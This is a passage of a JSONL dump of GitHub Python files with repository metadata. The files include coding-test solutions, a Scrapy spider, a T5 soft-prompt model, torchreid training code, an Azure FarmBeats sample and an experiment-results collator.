나누어 떨어지면 끝에는 무조건 4가 옴 (나머지 0이니까)\r\n \r\n 문제는 첫번째로 나누고 나서 그 이후 나머지가 한 index씩 밀려서 나옴\r\n \r\n 이건 idx -1 을 해줘서 보정해주면 그 다음 몫에서 에러가 남 \r\n \r\n 그냥 몫-1을 해줘서 idx를 하나씩 밀어주는 방법 채택\r\n \r\n '''\r\n answer = ''\r\n \r\n idx_lst = ['4','1','2']\r\n \r\n \r\n while n : \r\n n, mod = divmod(n, 3) ## 몫과 나머지 구하기\r\n answer += str(idx_lst[mod]) ## 하나씩 추가\r\n \r\n if not mod : ## mod가 0이 아니면\r\n n -= 1 ## n-1을 해줘서 나머지 idx가 밀리는 현상 보정\r\n \r\n return answer[::-1] ## +=로 추가했으므로 뒤집어서 마무리\r\n\r\n\r\n'''\r\n11 : 42\r\n12 : 44\r\n13 : 111\r\n14 : 112\r\n15 : 114\r\n16 : 121\r\n17 : 122\r\n18 : 124\r\n'''","repo_name":"paragonyun/CodingTest-Practice","sub_path":"프로그래머스/124 나라의 숫자.py","file_name":"124 나라의 숫자.py","file_ext":"py","file_size_in_byte":1337,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"8543847581","text":"# -*- coding: utf-8 -*-\n# emacs: -*- mode: python; py-indent-offset: 4; indent-tabs-mode: nil -*-\n# vi: set ft=python sts=4 ts=4 sw=4 et:\n\nfrom pathlib import Path\n\nfrom ..utils import findpaths\n\n\ndef iterpath(path):\n for parent in reversed(path.parents):\n if len(parent.name) > 0:\n yield parent.name\n yield path.name\n\n\nclass ReferenceCounter:\n def __init__(self):\n self.files = {}\n self.sets = []\n\n def addpath(self, path, jobid):\n curfiles = self.files\n for elem in iterpath(path.resolve()):\n if elem not in curfiles:\n curfiles[elem] = {}\n curfiles = curfiles[elem]\n if 0 not in curfiles or not isinstance(curfiles[0], set):\n curfiles[0] = set()\n self.sets.append(curfiles[0])\n curfiles[0].add(jobid)\n\n def put(self, result, jobid=0):\n paths = findpaths(result)\n while len(paths) > 0:\n path = Path(paths.pop())\n if path.is_dir():\n paths.extend(path.iterdir())\n else:\n self.addpath(path, jobid)\n\n def pop(self, jobid):\n for s in self.sets:\n if jobid in s:\n s.remove(jobid)\n\n def can_delete(self, path):\n if not isinstance(path, Path):\n path = Path(path)\n curfiles = self.files\n for elem in iterpath(path):\n if elem not in curfiles:\n return True\n curfiles = curfiles[elem]\n filesstack = [curfiles]\n while len(filesstack) > 0:\n files = filesstack.pop()\n for k, v in files.items():\n if k == 0:\n if len(v) > 0:\n return False\n else:\n filesstack.append(v)\n return True\n","repo_name":"mindandbrain/pipeline","sub_path":"pipeline/plugins/refcount.py","file_name":"refcount.py","file_ext":"py","file_size_in_byte":1817,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"54"} +{"seq_id":"27059082552","text":"import sys\n\ninput = sys.stdin.readlines\nprint = sys.stdout.write\nfrom collections import deque\n\n\ndef mergesort(arr):\n if len(arr) == 1:\n return arr\n mid = len(arr) // 2\n left = arr[:mid]\n right = arr[mid:]\n left = mergesort(left)\n right = mergesort(right)\n return merge(left, right)\n\n\ndef merge(left, right):\n result = deque()\n while len(left) > 0 or len(right) > 0:\n if len(left) > 0 and len(right) > 0:\n if left[0] > right[0]:\n result.append(right[0])\n right.popleft()\n else:\n result.append(left[0])\n left.popleft()\n elif len(left) > 0:\n result.append(left[0])\n left.popleft()\n elif len(right) > 0:\n result.append(right[0])\n right.popleft()\n return result\n\n\nn = int(input())\narr = deque(map(int, input().split()))\narr = mergesort(arr)\n\n","repo_name":"tjdgns1284/Algo-CS","sub_path":"csagain/0831/merges2.py","file_name":"merges2.py","file_ext":"py","file_size_in_byte":922,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"29361873195","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Jan 27 17:23:08 2021\n\n@author: William\n\"\"\"\n\n\n\n\n\n\n\n\n\n\nfrom __future__ import absolute_import\nfrom __future__ import print_function\nfrom __future__ import division\n\nimport sys\nimport re\nimport os\nimport glob\nimport os.path as osp\n\nfrom torchreid.data import ImageDataset\n\n\n\nclass Wyze2(ImageDataset):\n dataset_dir = 'wyze2'\n\n def __init__(self, root='', **kwargs):\n self.root = osp.abspath(osp.expanduser(root))\n self.dataset_dir = osp.join(self.root, self.dataset_dir)\n\n # All you need to do here is to generate three lists,\n # which are train, query and gallery.\n # Each list contains tuples of (img_path, pid, camid),\n # where\n # - img_path (str): absolute path to an image.\n # - pid (int): person ID, e.g. 0, 1.\n # - camid (int): camera ID, e.g. 0, 1.\n # Note that\n # - pid and camid should be 0-based.\n # - query and gallery should share the same pid scope (e.g.\n # pid=0 in query refers to the same person as pid=0 in gallery).\n # - train, query and gallery share the same camid scope (e.g.\n # camid=0 in train refers to the same camera as camid=0\n \n self.train_dir = osp.join(self.dataset_dir, 'train')\n self.query_dir = osp.join(self.dataset_dir, 'query')\n self.gallery_dir = osp.join(self.dataset_dir, 'gallery')\n \n # in query/gallery).\n train = self.process_dir(self.train_dir)\n query = self.process_dir(self.query_dir)\n gallery = self.process_dir(self.gallery_dir)\n\n super(Wyze2, self).__init__(train, query, gallery, **kwargs)\n \n def process_dir(self, dir_path):\n data = []\n img_paths = glob.glob(osp.join(dir_path, '*.jpg'))\n for img_path in img_paths:\n path_list = img_path.split(os.sep)\n img_name = path_list[6]\n pid, camid, img_num = img_name.split(\"_\")\n \n pid_num = int(re.findall(r'\\d+', pid)[0])\n camid_num = int(re.findall(r'\\d+', camid)[0])\n \n data.append((img_path, pid_num, camid_num))\n \n return data\n\n\n\n\n\n\n\n\n\n\n\nimport torchreid\n\n\n\n\n\ndef main ():\n #register once and then comment out\n torchreid.data.register_image_dataset('wyze2', Wyze2)\n #Load data manager\n \n #transforms=['random_flip', 'random_crop'] removed transofrms to solve an error\n #datamanager = torchreid.data.ImageDataManager(\n # root='reid-data',\n # sources= 'ilidsvid',\n # targets= 'ilidsvid', #can make this \"wyze2\"\n #height=256,\n #width=128,\n #batch_size_train=32, #batch size 2 for my dataset\n #batch_size_test=100 #batch size 2 for my dataset\n #)\n \n datamanager = torchreid.data.VideoDataManager(\n root='reid-data',\n sources='ilidsvid',\n height=256,\n width=128,\n batch_size_train=3,\n batch_size_test=3,\n seq_len=15,\n sample_method='evenly'\n )\n \n #Build model\n model = torchreid.models.build_model(\n name='osnet_x1_0',\n num_classes=datamanager.num_train_pids, #originally was this but to load a checkpoint we need to match the trained model class count datamanager.num_train_pids,\n loss='softmax',\n pretrained=False\n )\n \n #initialize model\n model = model.cuda()\n \n \n #setup optimizer\n optimizer = torchreid.optim.build_optimizer(\n model,\n optim='adam',\n lr=0.0003\n )\n \n #setup scheduler\n scheduler = torchreid.optim.build_lr_scheduler(\n optimizer,\n lr_scheduler='single_step',\n stepsize=20\n )\n \n \n #Build engine\n engine = torchreid.engine.ImageSoftmaxEngine(\n datamanager,\n model,\n optimizer=optimizer,\n scheduler=scheduler,\n label_smooth=True\n )\n\n #start_epoch = torchreid.utils.resume_from_checkpoint(\n # 'log/osnet/model/osnet_x1_0_market.pth',\n # model,\n # optimizer\n #) \n \n #run training and test\n engine.run(\n save_dir='log/osnet',\n max_epoch=10, #make start_epoch when loading and testing\n eval_freq=10,\n print_freq=50,\n visrank = True,\n visrank_topk=2,\n test_only=True\n )\n \nif __name__ == \"__main__\":\n main()","repo_name":"wdwright90/Wyze2_marauders_map","sub_path":"REID_model/my_torch_reid/my_torchreid.py","file_name":"my_torchreid.py","file_ext":"py","file_size_in_byte":4407,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"2366682165","text":"import torch\nimport math\nfrom collections import defaultdict\n\nclass Representation():\n\n def __init__(self, dim=4, device=\"cpu\"):\n self.dim = dim\n self.device = device\n self.params = dim * (dim - 1) // 2\n self.thetas = torch.autograd.Variable(math.pi*(2*torch.rand(self.params, device=self.device)-1) / dim,\n requires_grad=True)\n\n self.clear_matrix()\n\n def set_thetas(self, thetas):\n self.thetas = thetas.to(self.device)\n self.thetas.requires_grad = True\n self.clear_matrix()\n\n def clear_matrix(self):\n '''Clear the cached unitary matrix.\n\n The action matrix is cached to avoid re-calculating them at every step. However,\n if the underlying thetas are changed (e.g. after a step of SGD), this cache must\n be cleared so that the correct matrix is re-calculated and cached in its place.\n '''\n self.__matrix = defaultdict(lambda: None)\n\n def get_matrix(self, magnitude=1):\n if self.__matrix[magnitude] is None:\n k = 0\n mats = []\n for i in range(self.dim - 1):\n for j in range(self.dim - 1 - i):\n theta_ij = self.thetas[k] * magnitude\n k += 1\n c, s = torch.cos(theta_ij), torch.sin(theta_ij)\n\n rotation_i = torch.eye(self.dim, self.dim)\n rotation_i[i, i] = c\n rotation_i[i, i + j + 1] = s\n rotation_i[j + i + 1, i] = -s\n rotation_i[j + i + 1, j + i + 1] = c\n\n mats.append(rotation_i)\n\n def chain_mult(l):\n if len(l) >= 3:\n return l[0] @ l[1] @ chain_mult(l[2:])\n elif len(l) == 2:\n return l[0] @ l[1]\n else:\n return l[0]\n\n self.__matrix[magnitude] = chain_mult(mats).to(self.device)\n\n return self.__matrix[magnitude]","repo_name":"tomdbar/dynamical-disentanglement","sub_path":"src/representations.py","file_name":"representations.py","file_ext":"py","file_size_in_byte":2024,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"54"} +{"seq_id":"29806957901","text":"import re\nimport scrapy\nfrom ..items import Qd09TongrenItem_01\nclass TongrenSpider(scrapy.Spider):\n name = 'tongren_01'\n allowed_domains = []\n start_urls = [f'https://www.tongrenquan.org/tags-150-{page}.html' for page in range(0,52)]\n def parse(self, response):\n divs=response.css('.box div>.bk')\n for i in divs:\n link=i.css('a::attr(href)').get()\n link='https://www.tongrenquan.org'+link\n yield scrapy.Request(url=link,callback=self.parse_link)\n def parse_link(self,response):\n title=response.css('.clearfix .infos h1::text').get()\n span=response.css('.clearfix .infos .date span::text').get()\n lis=response.css('.book_list .clearfix>li')\n for i in lis:\n link=i.css('a::attr(href)').get()\n link='https://www.tongrenquan.org'+link\n yield scrapy.Request(url=link,callback=self.parse_text,meta={'title':title,'span':span})\n def parse_text(self,response):\n title=response.meta['title']\n span=response.meta['span']\n h1 = response.xpath('//div[@class=\"read_chapterName tc\"]/h1/text()').extract_first()\n text = response.xpath('//div[@class=\"read_chapterDetail\"]/p/text()').extract()\n text = '\\n'.join(text)\n yield Qd09TongrenItem_01(title=title,span=span, h1=h1,text=text)\n","repo_name":"wang2206/scrapy_text","sub_path":"qd_09_tongren/spiders/tongren_01.py","file_name":"tongren_01.py","file_ext":"py","file_size_in_byte":1336,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"25052140868","text":"from easy_api_builder.builder import apiBuilder, easyRequest\r\n\r\njson_response = \\\r\n{\r\n \"easy_api_builder.Version\": 0.1,\r\n \"downloads\": \"200+\"\r\n}\r\n\r\nbuilder = apiBuilder()\r\napi = builder.build_auth_api(json_response, [\"key\", \"key2\"], \"/\")\r\nbuilder.start(port=80)\r\n\r\n\r\n\r\n","repo_name":"Areoxy/easy_api_builder","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":275,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"71742012643","text":"# 2018 Winter Olympics Medals won by Country.\nimport plotly.offline as pyo\nimport plotly.graph_objs as go\nimport pandas as pd\n\ndf = pd.read_csv('data1.csv')\n\ndata = [go.Bar(\n x=df['NOC'], \n y=df['Total']\n)]\nlayout = go.Layout(\n title='Erasmus students outgoing Spain, Poland and Turkey'\n)\nfig = go.Figure(data=data, layout=layout)\npyo.plot(fig, filename='bar1.html')","repo_name":"daniel3423/scrum_day11.1","sub_path":"examples/bar1.py","file_name":"bar1.py","file_ext":"py","file_size_in_byte":376,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"23565262194","text":"\"\"\" Problem statement:\nhttps://leetcode.com/problems/sliding-window-maximum/description/\n\"\"\"\nimport random\nfrom collections import deque\n\n\nclass Solution:\n def max_window_brute(self, nums, k):\n \"\"\" Brute force algorithm.\n Time complexity: O(n * k). Space complexity: O(1), n is len(nums).\n \"\"\"\n n = len(nums)\n max_window = []\n for i in range(0, n - k + 1):\n curr_max = float(\"-inf\")\n for j in range(i, i + k): # find max in current window\n curr_max = max(curr_max, nums[j])\n max_window.append(curr_max)\n return max_window\n\n def max_window_deque(self, nums, k):\n \"\"\" Algorithm based on using dequeue. Assumes k <= len(nums).\n Time complexity: O(n). Space complexity: O(k), n is len(nums).\n \"\"\"\n if not nums: # special case, empty array\n return []\n if k > len(nums): # special case, k > len(nums)\n return [max(nums)]\n\n max_window = [] # resulting window\n deq = deque() # contains indices of the elements of nums\n # add index of elements to the dequeue from the 1st window\n for i in range(k):\n # remove all elements that <= current added element\n while deq and nums[deq[-1]] <= nums[i]:\n deq.pop() # remove from the right\n deq.append(i) # add from the right\n max_window.append(nums[deq[0]]) # add max element from the 1st window\n\n # loop over nums and check all other windows\n for i in range(k, len(nums)):\n # remove elements that fall out from the current window\n while deq and deq[0] <= i - k:\n deq.popleft() # remove from the left\n # remove all elements that <= current added element\n while deq and nums[deq[-1]] <= nums[i]:\n deq.pop()\n deq.append(i)\n max_window.append(nums[deq[0]]) # add current max to the result\n return max_window\n\n\ndef stress_test(func1, func2, n):\n \"\"\" Stress tests two functions against each other on a random input array.\n \"\"\"\n while True:\n nums = [random.randrange(1, 10**6) for i in range(n)]\n k = random.randrange(1, n + 1)\n res1 = func1(nums, k)\n res2 = func2(nums, k)\n if res1 == res2:\n print(\"OK\")\n print(res1[:10])\n else:\n print(f\"nums = {nums}\")\n print(f\"k = {k}\")\n print(f\"result 1 = {res1}\")\n print(f\"result 2 = {res2}\")\n break\n\n\nif __name__ == \"__main__\":\n sol = Solution()\n func = sol.max_window_deque\n\n # small tests\n assert func([1, 3, -1, -3, 5, 3, 6, 7], 3) == [3, 3, 5, 5, 6, 7]\n assert func([8, 5, 10, 7, 9, 4, 15, 12, 90, 13], 4) == [10, 10, 10, 15, 15, 90, 90]\n\n # stress testing slow and fast algorithms\n func1 = sol.max_window_brute\n func2 = sol.max_window_deque\n stress_test(func1, func2, 10**2)\n","repo_name":"vladn90/Algorithms","sub_path":"Stack/sliding_window_maximum.py","file_name":"sliding_window_maximum.py","file_ext":"py","file_size_in_byte":2969,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"1645100424","text":"from typing import Tuple, List, Optional, Any, Dict, Union\n\nfrom rest_framework.routers import SimpleRouter, Route, DynamicRoute\nfrom django.views import View\n\n\n# (self, prefix, viewset, basename=None)\nRouteArg = Union[\n Tuple[str, View, Optional[str]],\n Tuple[str, View]\n]\n\n\nclass DefaultRouter(SimpleRouter):\n routes = [\n # List route.\n Route(\n url=r'^{prefix}{trailing_slash}$',\n mapping={\n 'get': 'list',\n 'post': 'create'\n },\n name='{basename}.list',\n detail=False,\n initkwargs={'suffix': 'List'}\n ),\n # Dynamically generated list routes. Generated using\n # @action(detail=False) decorator on methods of the viewset.\n DynamicRoute(\n url=r'^{prefix}/{url_path}{trailing_slash}$',\n name='{basename}.{url_name}',\n detail=False,\n initkwargs={}\n ),\n # Detail route.\n Route(\n url=r'^{prefix}/{lookup}{trailing_slash}$',\n mapping={\n 'get': 'retrieve',\n 'put': 'update',\n 'patch': 'partial_update',\n 'delete': 'destroy'\n },\n name='{basename}.detail',\n detail=True,\n initkwargs={'suffix': 'Instance'}\n ),\n # Dynamically generated detail routes. Generated using\n # @action(detail=True) decorator on methods of the viewset.\n DynamicRoute(\n url=r'^{prefix}/{lookup}/{url_path}{trailing_slash}$',\n name='{basename}.{url_name}',\n detail=True,\n initkwargs={}\n ),\n ]\n\n def __init__(\n self, routes: Optional[List[RouteArg]] = None, trailing_slash=True,\n *args: List[Any], **kwargs: Dict[str, Any]\n ):\n super().__init__(trailing_slash=trailing_slash, *args, **kwargs)\n\n if routes:\n route: RouteArg\n for route in routes:\n self.register(*route)","repo_name":"rypconsultores/sernatur-backend","sub_path":"apps/c19trace/rest/routers.py","file_name":"routers.py","file_ext":"py","file_size_in_byte":2020,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"25491218807","text":"from numpy import datetime_data\nfrom transformers import T5Tokenizer,T5ForConditionalGeneration,T5Config\nfrom torch import nn\nimport numpy as np\nimport torch\nimport pickle\nclass MNLIT5(nn.Module):\n def __init__(self,original_t5:bool,checkpoint:str,soft_prompt:bool,prefix:str,infix:str,suffix:str):\n super(MNLIT5,self).__init__()\n self.original_t5=original_t5\n self.config=T5Config.from_pretrained(checkpoint) \n self.t5=T5ForConditionalGeneration.from_pretrained(checkpoint,config=self.config) \n self.tokenizer=T5Tokenizer.from_pretrained(checkpoint)\n self.soft_embedding_layer=None \n self.normal_embedding_layer=self.t5.get_input_embeddings()\n self.soft_prompt=soft_prompt\n if soft_prompt: \n \n self.prefix_soft_index,self.infix_soft_index,self.suffix_soft_index=eval(prefix),eval(infix),eval(suffix)\n #[3,27569,10],[11167,10],[31484,17,10,1]\n self.p_num,self.i_num,self.s_num=len(self.prefix_soft_index),len(self.infix_soft_index),len(self.suffix_soft_index)\n self.prefix_soft_embedding_layer=nn.Embedding(\n self.p_num,self.config.hidden_size\n )\n self.infix_soft_embedding_layer=nn.Embedding(\n self.i_num,self.config.hidden_size\n )\n self.suffix_soft_embedding_layer=nn.Embedding(\n self.s_num,self.config.hidden_size\n )\n \n self.prefix_soft_embedding_layer.weight.data=torch.stack(\n [self.normal_embedding_layer.weight.data[i,:].clone().detach().requires_grad_(True) for i in self.prefix_soft_index]\n )\n self.infix_soft_embedding_layer.weight.data=torch.stack(\n [self.normal_embedding_layer.weight.data[i,:].clone().detach().requires_grad_(True) for i in self.infix_soft_index]\n )\n self.suffix_soft_embedding_layer.weight.data=torch.stack(\n [self.normal_embedding_layer.weight.data[i,:].clone().detach().requires_grad_(True) for i in self.suffix_soft_index]\n )\n self.prefix_soft_ids=torch.tensor(range(self.p_num))\n self.infix_soft_ids=torch.tensor(range(self.i_num))\n self.suffix_soft_ids=torch.tensor(range(self.s_num))\n for param in self.t5.parameters():\n param.requires_grad_(False)\n \n\n def forward(self,input_ids,attention_mask,hypothesis_ids,premise_ids,hypothesis_attention_mask,premise_attention_mask,labels):\n batch_size=input_ids.shape[0]\n decoder_input_ids=torch.zeros(batch_size,1,dtype=int).to(input_ids.device)\n if self.soft_prompt:\n \n prefix_soft_ids=torch.stack([self.prefix_soft_ids for i in range(batch_size)]).to(input_ids.device)\n infix_soft_ids=torch.stack([self.infix_soft_ids for i in range(batch_size)]).to(input_ids.device)\n suffix_soft_ids=torch.stack([self.suffix_soft_ids for i in range(batch_size)]).to(input_ids.device)\n \n prefix_soft_embeddings=self.prefix_soft_embedding_layer(prefix_soft_ids)\n infix_soft_embeddings=self.infix_soft_embedding_layer(infix_soft_ids)\n suffix_soft_embeddings=self.suffix_soft_embedding_layer(suffix_soft_ids)\n \n hypothesis_embeddings=self.normal_embedding_layer(hypothesis_ids)\n premise_embeddings=self.normal_embedding_layer(premise_ids)\n \n \n input_embeddings=torch.cat(\n [prefix_soft_embeddings,hypothesis_embeddings,infix_soft_embeddings,premise_embeddings,suffix_soft_embeddings],\n dim=1\n )\n \n prefix_soft_attention_mask=torch.ones(batch_size,self.p_num).to(input_ids.device)\n infix_soft_attention_mask=torch.ones(batch_size,self.i_num).to(input_ids.device)\n suffix_soft_attention_mask=torch.ones(batch_size,self.s_num).to(input_ids.device)\n \n attention_mask=torch.cat(\n [prefix_soft_attention_mask,hypothesis_attention_mask,infix_soft_attention_mask,premise_attention_mask,suffix_soft_attention_mask],\n dim=1\n )\n if self.original_t5:\n batch_loss=self.t5(\n inputs_embeds=input_embeddings,\n labels=labels,\n attention_mask=attention_mask,\n return_dict=True\n ).loss\n return None,batch_loss\n else:\n output=self.t5(\n inputs_embeds=input_embeddings,\n decoder_input_ids=decoder_input_ids,\n attention_mask=attention_mask,\n return_dict=True\n )\n else:\n if self.original_t5:\n batch_loss=self.t5(\n input_ids=input_ids,\n labels=labels,\n attention_mask=attention_mask,\n return_dict=True\n ).loss\n return None,batch_loss\n else:\n output=self.t5(\n input_ids=input_ids,\n decoder_input_ids=decoder_input_ids,\n attention_mask=attention_mask,\n return_dict=True\n )\n logits=output.logits\n batch_score=logits[:,0,[1176,7163,6136]]\n return batch_score,None\n\n \n \n\n \n\n","repo_name":"NEUIR/P3Ranker","sub_path":"Prefinetune/mnli_model.py","file_name":"mnli_model.py","file_ext":"py","file_size_in_byte":5520,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"54"} +{"seq_id":"26036971385","text":"if __package__:\n from .provider.equity import *\nelse:\n from provider.equity import *\nfrom datetime import datetime, timedelta\nfrom dateutil import tz\nfrom itertools import chain, groupby\nfrom decimal import Decimal\n\n# 以每日此时间前收盘作为交易日分界\nTRADING_START_HOUR = 8\n\ntz_sh = tz.gettz('Asia/Shanghai')\nnow = datetime.now(tz=tz_sh)\nzero_today = now - timedelta(hours=now.hour, minutes=now.minute,\n seconds=now.second, microseconds=now.microsecond)\nTRADE_TODAY = zero_today + timedelta(hours=TRADING_START_HOUR)\n\n\ndef divide_by_provider(equities):\n d = dict([(p['id'], (p, [])) for p in EQUITY_PROVIDER])\n for e in equities:\n d[e['source']][1].append(e)\n return d\n\n\ndef get_data_from_provider(provider, equities):\n source_ids = [e['source_id'] for e in equities]\n res = provider['object'].realtime(source_ids)\n for item in equities:\n item_res = filter(lambda r: r['source_id'] == item['source_id'], res)\n try:\n status = next(item_res)\n item.update(status)\n except StopIteration:\n continue\n return equities\n\n\ndef get_history_from_provider(provider, equities, **kwargs):\n items = []\n for e in equities:\n r = e.copy()\n r['history'] = provider['object'].history(e['source_id'], **kwargs)\n items.append(r)\n return items\n\n\ndef combine_summary(d):\n equities = list(chain(*d.values()))\n for e in equities:\n e['weight'] = Decimal(e['weight'])\n equities.sort(key=lambda e: e['weight'], reverse=True)\n\n latest = datetime.min.replace(tzinfo=tz_sh)\n total_w, total_p, today_w, today_p = Decimal(\n 0), Decimal(0), Decimal(0), Decimal(0)\n for e in equities:\n total_p += e['weight'] * e['change_percent'] / 100\n total_w += e['weight']\n latest = max(e['time'], latest)\n if e['time'] >= TRADE_TODAY:\n today_p += e['weight'] * e['change_percent'] / 100\n today_w += e['weight']\n total_p /= total_w / 100\n if today_w > 0:\n today_p /= today_w / 100\n\n return equities, {\n 'last_update': latest,\n 'total_weight': total_w,\n 'total_percent': total_p,\n 'today_weight': today_w,\n 'today_percent': today_p\n }\n\n\ndef single_fetch(equity):\n d = dict([(p['id'], p) for p in EQUITY_PROVIDER])\n return get_data_from_provider(d[equity['source']], [equity])[0]\n\ndef fetch(equities):\n d = divide_by_provider(equities)\n for provider in d:\n d[provider] = get_data_from_provider(*d[provider])\n return combine_summary(d)\n\ndef fetch_history(equities, **kwargs):\n d = divide_by_provider(equities)\n s = []\n for provider in d:\n s += get_history_from_provider(*d[provider], **kwargs)\n return s\n","repo_name":"lxhkkll/qdii-value","sub_path":"qdii_value/processing.py","file_name":"processing.py","file_ext":"py","file_size_in_byte":2791,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"54"} +{"seq_id":"3500116352","text":"from azure.identity.aio import DefaultAzureCredential\nfrom azure.agrifood.farming.aio import FarmBeatsClient\nfrom datetime import datetime\nimport os\nfrom dotenv import load_dotenv\nimport asyncio\nimport random\n\n\nasync def create_party():\n farmbeats_endpoint = os.environ['FARMBEATS_ENDPOINT']\n\n credential = DefaultAzureCredential()\n client = FarmBeatsClient(\n endpoint=farmbeats_endpoint,\n credential=credential\n )\n\n party_id = f\"contoso-party-{random.randint(0,1000)}\"\n\n # Create or update a party within FarmBeats.\n party = await client.parties.create_or_update(\n party_id=party_id,\n party={\n \"name\": \"contoso party\",\n \"status\": \"created from SDK\",\n \"description\": \"created from SDK\"\n }\n )\n print(party)\n\n await client.close()\n await credential.close()\n\nif __name__ == \"__main__\":\n load_dotenv()\n\n loop = asyncio.new_event_loop()\n asyncio.set_event_loop(loop)\n asyncio.run(create_party())","repo_name":"Azure/azure-sdk-for-python","sub_path":"sdk/agrifood/azure-agrifood-farming/samples/async/sample_create_farmer_async.py","file_name":"sample_create_farmer_async.py","file_ext":"py","file_size_in_byte":1003,"program_lang":"python","lang":"en","doc_type":"code","stars":3916,"dataset":"github-code","pt":"54"} +{"seq_id":"27844062278","text":"import csv\n\nfrom pathlib import Path\nfrom typing import Any, Iterable, Dict, Literal, Sequence, TypeVar, overload\n\nimport pandas as pd\n\nfrom ruamel.yaml import YAML\nfrom tensorboard.backend.event_processing.event_accumulator import EventAccumulator\nfrom pydrobert.param.serialization import register_serializer\n\nfrom scpc.train import LightningPretrainedFrontendParams as Params\n\n__all__ = [\n \"collate_data\",\n \"check_data\",\n \"filter_data_in\",\n \"filter_data_equal\",\n]\n\nMODEL_BLACKLIST = (\n \"cpc.mono\",\n \"cpc.deft\",\n \"cpc.tri\",\n \"superb.fbank\",\n)\n\n\nregister_serializer(\"reckless_json\")\n\n\ndef collate_data(\n results_from: Literal[\"zrc\", \"tb\"] = \"zrc\",\n exp_dir: str = \"../exp\",\n model_blacklist: Sequence[str] = MODEL_BLACKLIST,\n collapse_distributed: bool = True,\n):\n \"\"\"Combine experiment parameters and results\"\"\"\n yaml = YAML(typ=\"safe\", pure=True)\n\n model_data, res_data = [], []\n exp_dir: Path = Path(exp_dir)\n for id, pth in enumerate(exp_dir.glob(\"*/*/model.yaml\")):\n model, version = pth.parts[-3:-1]\n if model in model_blacklist:\n continue\n\n datum = yaml.load(pth)\n datum[\"id\"] = id\n # clobbers useless 'name' field\n datum[\"name\"] = f\"{model}/{version}\"\n datum[\"version\"] = int(version.split(\"_\")[1])\n model_data.append(datum)\n\n if results_from == \"zrc\":\n for zrc_pth in pth.parent.glob(\n \"zrc/librispeech/**/scores/score_all_phonetic.csv\"\n ):\n pca_style = zrc_pth.parts[-3]\n assert pca_style == \"full\" or pca_style.startswith(\"pca_\"), zrc_pth\n with zrc_pth.open(newline=\"\") as f:\n reader = csv.DictReader(f)\n for row in reader:\n row[\"pca_style\"] = pca_style\n row[\"score\"] = float(row[\"score\"])\n datum = dict(id=id, zrc=row)\n res_data.append(datum)\n elif results_from == \"tb\":\n for event_path in exp_dir.glob(f'tb_logs/{datum[\"name\"]}/events.*'):\n ea = EventAccumulator(str(event_path))\n ea.Reload()\n if ({\"epoch\", \"val_loss\"} - set(ea.Tags()[\"scalars\"])) != set():\n continue\n for epoch, val_loss in zip(ea.Scalars(\"epoch\"), ea.Scalars(\"val_loss\")):\n assert epoch.step == val_loss.step\n datum = dict(\n id=id,\n tb=dict(\n step=int(epoch.step),\n epoch=int(epoch.value),\n val_loss=val_loss.value,\n ),\n )\n res_data.append(datum)\n else:\n raise NotImplementedError\n\n df = pd.json_normalize(model_data).set_index(\"id\")\n\n # throw away columns we probably don't care about\n df = df.drop(\n list(df.filter(regex=r\"\\.name$\").columns)\n + [\n \"system_description\",\n \"training.accelerator\",\n \"training.cpc_loss.speaker_regex\",\n ],\n axis=1,\n )\n\n # for convenience, we remap any rows with context_type == 'id' to\n # context_type == 'csa', but with 0 layers and max_width 1\n # idx = df['context_type'] == 'id'\n df.loc[\n df[\"context_type\"] == \"id\",\n [\n \"context_type\",\n \"csa.num_layers\",\n \"csa.num_heads\",\n \"csa.dim_feedforward\",\n \"csa.max_width\",\n ],\n ] = [\"csa\", 0, 8, 1024, 1]\n\n # depopulate the values which were not selected\n latent_types: Sequence[str] = Params.param.latent_type.objects\n for latent_type in latent_types:\n latent_ne_idx = df[\"latent_type\"] != latent_type\n latent_cols = df.filter(regex=f\"^{latent_type}\\\\.\").columns\n df.loc[latent_ne_idx, latent_cols] = pd.NA\n\n context_types: Sequence[str] = Params.param.context_type.objects\n for context_type in context_types:\n context_ne_idx = df[\"context_type\"] != context_type\n context_cols = df.filter(regex=f\"^{context_type}\\\\.\").columns\n df.loc[context_ne_idx, context_cols] = pd.NA\n\n loss_types: Sequence[str] = Params.param.training.class_.param.loss_type.objects\n for loss_type in loss_types:\n loss_ne_idx = df[\"training.loss_type\"] != loss_type\n loss_cols = df.filter(\n regex=f\"^training\\\\.{loss_type.replace('-', '_')}_loss\"\n ).columns\n df.loc[loss_ne_idx, loss_cols] = pd.NA\n\n if collapse_distributed:\n # make turn task-level sizes into global sizes by multiplying by num_devices and\n # num_nodes\n num_devices = df[\"training.num_devices\"].fillna(1)\n num_nodes = df[\"training.num_nodes\"].fillna(1)\n df[\"training.data.common.batch_size\"] *= (num_devices * num_nodes).astype(\n df[\"training.data.common.batch_size\"].dtype\n )\n chunk_idx = df[\"training.chunking.max_chunks\"].notna()\n df.loc[chunk_idx, \"training.chunking.max_chunks\"] *= (\n (num_devices * num_nodes)\n .astype(df[\"training.chunking.max_chunks\"].dtype)\n .loc[chunk_idx]\n )\n\n df = df.drop([\"training.num_devices\", \"training.num_nodes\"], axis=1)\n\n df = pd.json_normalize(res_data).join(df, on=\"id\", validate=\"m:1\")\n df = df.drop(\n [\"id\", \"training.data.common.subset_ids\"], axis=1\n ) # we no longer need this\n\n df = df.dropna(axis=1, how=\"all\") # remove columns which are all NA\n\n # make all string-based entries categorical\n df = df.astype(dict((x, \"category\") for x in 